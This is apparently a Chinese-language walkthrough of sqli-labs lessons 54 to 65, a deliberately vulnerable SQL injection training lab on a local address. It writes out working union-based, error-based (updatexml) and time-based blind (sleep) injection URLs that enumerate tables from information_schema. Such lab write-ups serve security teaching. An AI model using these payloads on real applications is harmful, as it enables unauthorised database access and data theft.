Less54-Less65
Less-54:使用’’包裹
对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名
http://192.168.27.156/sqli-labs/Less-54/?id=1'order by 4 --+ 存在三列
http://192.168.27.156/sqli-labs/Less-54/?id=-1'union select 1,2,3 --+ 找到回显位置
http://192.168.27.156/sqli-labs/Less-54/?id=-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+
下面按照第一关那样就可以
Less55: 使用()包裹 对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名
其他与第54关一致
Less56:使用('’)包裹 其他与第54关一致
Less57:使用””包裹 其他与第54关一致
Less58:使用’’包裹 5次机会
http://192.168.27.156/sqli-labs/Less-58/?id=-1' union select 1,2,3 --+ 但是在下图并没有显示回显的位置
所以我们使用报错注入
http://192.168.27.156/sqli-labs/Less-58/?id=-1'andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+
得到表ast230gxyj
其他与第1关是一样的
Less59:无包裹使用报错注入方法与第58关一致
Less60:使用(“”)包裹 采用报错注入与前面一致
Less61:使用((‘’))包裹采用报错注入方法与前面一致
Less62:使用((‘’))包裹 130次 方法与前面一致
使用时间盲注
http://192.168.27.156/sqli-labs/Less-62/?id=1') and if((length(database())=1),1,sleep(5))--+
判断数据库的长度
http://192.168.27.156/sqli-labs/Less-62/?id=1') and if( left( (select table_name from information_schema.tables where
table_schema='CHALLENGES' limit 0,1),1)> 'd' ,1, sleep(5)) --+
判断表的第一位字母是不是比d大
Less63:使用‘’包裹 130次 方法与第62关一致
使用时间盲注
Less64:使用(())包裹 130次 方法与第62关一致
Less65:使用(“”)包裹 130次 方法与第62关一致